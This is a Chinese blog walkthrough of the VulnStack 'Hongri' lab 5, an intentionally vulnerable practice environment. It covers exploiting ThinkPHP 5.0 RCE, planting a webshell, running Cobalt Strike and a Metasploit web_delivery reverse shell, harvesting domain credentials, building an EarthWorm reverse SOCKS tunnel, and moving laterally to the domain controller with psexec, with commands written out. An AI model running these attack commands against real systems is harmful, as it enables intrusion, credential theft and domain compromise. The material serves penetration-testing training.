红队打靶,红日系列,红日靶场5

已于 2023-07-30 17:26:05 修改
阅读量454 收藏 1
点赞数
分类专栏: 红队打靶 文章标签: web安全 安全 网络安全
于 2023-07-27 16:27:03 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47289634/article/details/131952476
版权

文章目录

靶场详情

此次靶场虚拟机共用两个,一个外网一个内网,用来练习红队相关内容和方向,主要包括常规信息收集、Web攻防、代码审计、漏洞利用、内网渗透以及域渗透等相关内容学习

Windows 7:

•Web服务器(使用的是PHPStudy,记得自己手动开一下)
•模拟外网IP:192.168.0.100
•内网IP:192.168.138.136

Windows Server 2008:

•域控制器
•内网IP:192.168.138.138

攻击者VPS:

•OS:Kali Linux
•IP:192.168.0.101

外网渗透

端口扫描

发现Web服务和Mysql:

nmap -sS -P0 -sV -O 192.168.0.100

在这里插入图片描述
访问80端口发现是个thinkphp5.0:

在这里插入图片描述
随意输入一个不存在的页面,爆出具体版本
在这里插入图片描述

漏洞发现与利用

既然是V5.0,那么我们就可以尝试一下Thinkphp远程命令执行漏洞

  1. 使用工具,发现目标存在多个漏洞
    在这里插入图片描述
    随意利用一个
    在这里插入图片描述

  2. 使用kali的searchsploit查找一下漏洞利用POC:

    searchsploit thinkphp

    在这里插入图片描述
    复制到桌面,查看一下poc
    在这里插入图片描述
    在这里插入图片描述

获取shell

这里我直接用的工具上传的shell,也可以根据上面kali中poc的提示写进去
在这里插入图片描述
使用冰蝎连接,外网渗透结束
在这里插入图片描述

内网渗透

提权

打开神器CS,创建监视器,生成木马
在这里插入图片描述
在这里插入图片描述
使用冰蝎将刚刚生成的马子上传到服务器并执行
在这里插入图片描述
成功上线
在这里插入图片描述
使用插件提权,权限变成了system
在这里插入图片描述

内网信息收集

接下来要做的就是信息收集了,常见姿势了解一下

 ipconfig /all   # 查看本机ip,所在域
 route print     # 打印路由信息
 net view        # 查看局域网内其他主机名
 arp -a          # 查看arp缓存
 whoami          # 查看当前用户
 net start       # 查看开启了哪些服务
 net share       # 查看开启了哪些共享
 
 net config workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域
 net user                 # 查看本机用户列表
 net user /domain         # 查看域用户
 net localgroup administrators   # 查看本地管理员组(通常会有域用户)
 net view /domain         # 查看有几个域
 net user 用户名 /domain   # 获取指定域用户的信息
 net group /domain        # 查看域里面的工作组,查看把用户分了多少组(只能在域控上操作)
 net group 组名 /domain    # 查看域中某工作组
 net group "domain admins" /domain  # 查看域管理员的名字
 net group "domain computers" /domain  # 查看域中的其他主机名
 net group "domain controllers" /domain  # 查看域控制器(可能有多台)

目标主机所在的网络环境还存在一个192.168.138.0的网段,并且存在一个名为“sun”的域环境。
域控制器为DC$,域管理员为Administrator。
在这里插入图片描述
对内网来个大保健(详细扫描),发现内网服务器为server2008,192.168.138.138,还存在ms17010
在这里插入图片描述
使用插件提权,抓一下明文密码,成功抓取到了域管理员Administrator和域用户leo的密码:

•SUN\Administrator:dc123.com
•SUN\leo:123.com
在这里插入图片描述

横向移动

第一种使用CS

对138网段进行常见端口扫描,直接就发现了138.138,还判断出了为dc
在这里插入图片描述
用win7当跳板上线dc
新建监视器,使用smb协议,地址选择win7的ip
在这里插入图片描述
使用psexe64进行横向移动
在这里插入图片描述
使用刚刚收集到的凭据,上线成功
在这里插入图片描述
在这里插入图片描述

第二种使用msf

这里我们使用metasploit的web_delivery模块:

use exploit/multi/script/web_delivery
set target 2    # 选择使用powershell类型的payload
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.0.100
exploit

在这里插入图片描述

将上面生成的payload在目标主机上执行:
在这里插入图片描述
上线成功
在这里插入图片描述
getsystem一下
在这里插入图片描述
这里也可以执行一下内网信息收集的命令

路由转发与代理通道

通过冰蝎在Windows 7上传earthworm,搭建socks5反向代理服务。
在攻击机kali上执行如下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

然后配置proxychains,将socks5服务器指向127.0.0.1:1080

vim /etc/proxychains4.conf

在这里插入图片描述
在Windows 7上传ew_for_Win.exe并执行如下:

ew_for_Win.exe -s rssocks -d 192.168.0.100 -e 1234

之后便可以使用proxychains将我们的程序代理进内网了。

Psexec 攻击

既然已经获得了域管理员的用户名密码,那么我们直接尝试使用psexec登录域控(Windows 2008):

use exploit/windows/smb/psexec
set rhosts 192.168.138.138
set SMBDomain SUN
set SMBUser administrator
set SMBPass dc123.com
# set SMBPass c8c42d085b5e3da2e9260223765451f1:e8bea972b3549868cecd667a64a6ac46
set payload windows/meterpreter/bind_tcp
set rhost 192.168.138.138
run

成功上线。
在这里插入图片描述

青衫木马牛
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
渗透系列:ATT&CK红队评估(红日靶场二)
weixin_54626591的博客
01-22 201
ATT&CK红队评估(红日靶场二)
ATT&CK红队评估(红日靶场五)
weixin_45682839的博客
04-30 1658
ATT&CK红队评估(红日靶场五)通关攻略,涉及知识包括:ThinkPHP5.0 RCE漏洞、内网渗透、横向移动、psexec使用、代理建立,matespolit、cobaltstrike等工具使用。
红日靶场(五)
qq_58091216的博客
05-05 2545
3) 然后,我们修改域控主机的DSRM账户登录方式。我们可以在注册表的HKLM:\System\CurrentControlSet\Control\Lsa\中新建DsrmAdminLogonBehavior项进行设置,将该新建的项中的值设为0、1、2可以分别设置不同的DSRM账户登录方式。通过信息收集,目标主机所在的域环境,域名为sun.com,存在两台域主机DC和win7.DC的ip为:192.168.138.138,win7双网卡:192.168.135.150、192.168.138.136。
红日安全-VulnStack】ATT_CK实战系列——红队实战(—)
st3pby的博客
11-15 1453
红日安全-VulnStack】ATT_CK实战系列——红队实战(—)
红日php代码审计,[红日安全]代码审计Day3 - 实例化任意对象漏洞
weixin_29454359的博客
03-26 466
本文由红日安全成员:七月火编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫PHP-Audit-Labs。现在大家所看到的系列文章,属于项目第一阶段的内容,本阶段的内容题目均来自PHP SECURITY CALENDAR 2017。对于每一道题目,我们均给出对应的分析,并结合实际C...
红日安全 vulnstack (一)(2),五面拿下阿里飞猪offer
2401_83974370的博客
04-14 317
我们这边整理一下,因为这是我们自己搭建的,所以我们物理机肯定和nat网是通的,但是真实情况是win7nat网是外网,所以不能直接用内网cs做服务器,要用公网做服务器,因为内网cs做服务器,外网是ping不通的内网的。我们现在的问题是没有办法直连这三台主机,因为这三台主机不出网,所以我们需要利用中转服务器做一个sock5代理。通过phpinfo 知道C:/phpStudy/WWW/phpinfo.php这是网站根目录。,内网网段为192.168.52.1/24,我们用Ping命令探测域控的ip。
红日打靶!!!
woshicainiao666的博客
02-02 895
网站的IP地址明明是192.168.0.101,但是ip a命令,看到IP地址是192.168.93.120。>在/tmp/mysql/test.txt中发现账号密码 wwwuser/wwwuser_123Aqx。web-cenctos,开启后要输入/etc/init.d/network restart 重启网卡。将文件中的bypass_disablefunc.php上传到网站根路径/var/www/html/将bypass_disablefunc_x64.so上传到/var/www/下。
红日靶场
weixin_44339234的博客
07-11 1424
新手学习记录,有误之处多多指点
红日靶场(一)
weixin_55554070的博客
03-01 5909
一、环境配置 1.靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 2.环境IP配置: kali:net模式(外网):192.168.159.131 win7: VMnet1(内网):192.168.52.143 net模式(外网):192.168.159.136 3.测试连通性: win7能ping通所有主机,所有主机都ping不通win7,因为win7的防火墙过滤了icmp 4.开启web服务 在win7上使用phpst
ATT&CK红队评估(红日靶场四)
weixin_45682839的博客
04-28 5521
ATT&CK红队评估(红日靶场四)通关攻略,涉及知识包括: Struts2漏洞利用、phpmyadmin getshell、tomcat 漏洞利用、ms17_010、docker逃逸、ms14_068、ssh密钥利用、流量转发、横向移动、内网渗透等。
红队攻防知识分享-红日安全团队靶场1
beirry的博客
03-23 8856
环境搭建 靶场链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 环境拓扑图: 以下是虚拟机网络配置 虚拟机 网络配置 Windows7 x64 VMnet1:192.168.52.128;VMnet2:192.168.54.128 Win2k3 Measploitable VMnet1:192.168.52.141 Windows Server 2008 R2 x64 VMnet1:192.168.52.138 kali V
ATT&CK红队评估(红日靶场二)
weixin_45682839的博客
04-11 2815
靶场搭建 靶场下载地址:漏洞详情 一共有三台主机:WEB、DC、PC WEB主机有两张网卡,第一张网卡NAT,第二张网卡选择一个仅主机模式的网络(vmvare可以通过编辑里的虚拟网络编辑器进行添加或修改网络)这里我选择的是创建的仅主机vmnet15网络 DC主机只有一张网卡,选择和WEB第二章网卡一样的vmnet15网络 PC有两张网卡,配置和WEB主机一样,第一张网卡NAT,第二张网卡vmnet15 网络设置完成后进行开机 WEB主机以administrator第一次登录时没
红日靶场系列】ATT&CK红队评估5
weixin_45632448的博客
09-29 1721
SMB Beacon使用命名管道通过父级Beacon进行通讯,当两个Beacons链接后,子Beacon从父Beacon获取到任务并发送。因为链接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。黄金票据可以在拥有普通域用户权限和KRBTGT账号的哈希的情况下用来获取域管理员权限,上面已经获得域控的 system 权限了,还可以使用黄金票据做权限维持,当域控权限掉后,在通过域内其他任意机器伪造票据重新获取最高权限。
%3c?php else:?%3e,[红日安全]代码审计Day15 - $_SERVER['PHP_SELF']导致的防御失效问题
weixin_33784572的博客
03-24 364
本文由红日安全成员: DYBOY 编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 PHP-Audit-Labs 。现在大家所看到的系列文章,属于项目 第一阶段 的内容,本阶段的内容题目均来自 PHP SECURITY CALENDAR 2017 。对于每一道题目,我们均给出对应的分析,并结...
红日安全vulnstack-ATT&CK实战系列 红队实战(一)
热门推荐
遇事不决冲冲冲
12-25 1万+
一.介绍 vulnstack官网下载地址,也是拿百度网盘下载的,这里也放一个链接提取码: i7xv 官方靶机说明: 红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。另外本次实战完全模拟 ATT&CK攻击链路进行搭建,开成完整闭环。后续也会搭建真实 APT 实战环境,从实战中成长。虚拟机所有统一密码:hongrisec@2019 整体思路 信息收集发现yxcms框架的网页,通过漏洞利用get到shell,拿cs控制后进行内网信息收集以及横向移动,最终用窃
PHP ctf addslashes,[红日安全]代码审计Day13 - 特定场合下addslashes函数的绕过
weixin_33631836的博客
03-17 709
本文由红日安全成员: l1nk3r 编写,如有不当,还望斧正。前言大家好,我们是红日安全-代码审计小组。最近我们小组正在做一个PHP代码审计的项目,供大家学习交流,我们给这个项目起了一个名字叫 PHP-Audit-Labs 。现在大家所看到的系列文章,属于项目 第一阶段 的内容,本阶段的内容题目均来自 PHP SECURITY CALENDAR 2017 。对于每一道题目,我们均给出对应的分析,并...
网盾安全学院综合靶场-ThinkPHP5 远程代码执行漏洞通关功略
m0_54360887的博客
02-24 3454
漏洞概述 我们知道在ThinkPHP5中是有远程代码执行漏洞的。这个漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。 write up 靶场地址:http://ctf.wangdun.cn 靶场信息: 影响范围 ThinkPHP 5.0.全版本 这个漏洞在测试当中发现该漏洞并不通杀,还是得看复现的版本,目前所测试的情况如下: 当前映射80端口为47052,我们访问该地址 我们可以构造payload来测试下命令执行漏洞: ..
网络安全(黑客)——自学2024
最新发布
2401_84466325的博客
08-25 766
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
红日靶场php study
08-24
PHPStudy是一款集成了Apache、MySQL和PHP的软件套件,用于在Windows平台上搭建PHP开发环境的工具。它提供了一键安装和配置的功能,方便用户快速搭建本地开发环境。 关于你提到的关于网站内部写入木马的问题,根据引用和引用的内容,可以通过修改PHPStudy的配置文件,将日志文件写入指定位置,并在该位置插入一句话木马。这样,当访问日志文件时,就能证明文件写入成功。而要在网站内部写入木马,需要获取网站的绝对路径,可以通过报错或查询PHP配置信息等方法来获取。最后,可以使用MySQL的select语句将木马写入到网站的根目录,如引用中所述。 总结起来,PHPStudy是用于搭建PHP开发环境的工具,而关于网站内部写入木马的过程,可以通过修改配置文件、获取网站路径和使用MySQL语句等方法来实现。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [红日内网渗透靶场1(ATK&CK红队评估实战靶场一)](https://blog.csdn.net/qq_45780190/article/details/122951320)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

青衫木马牛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值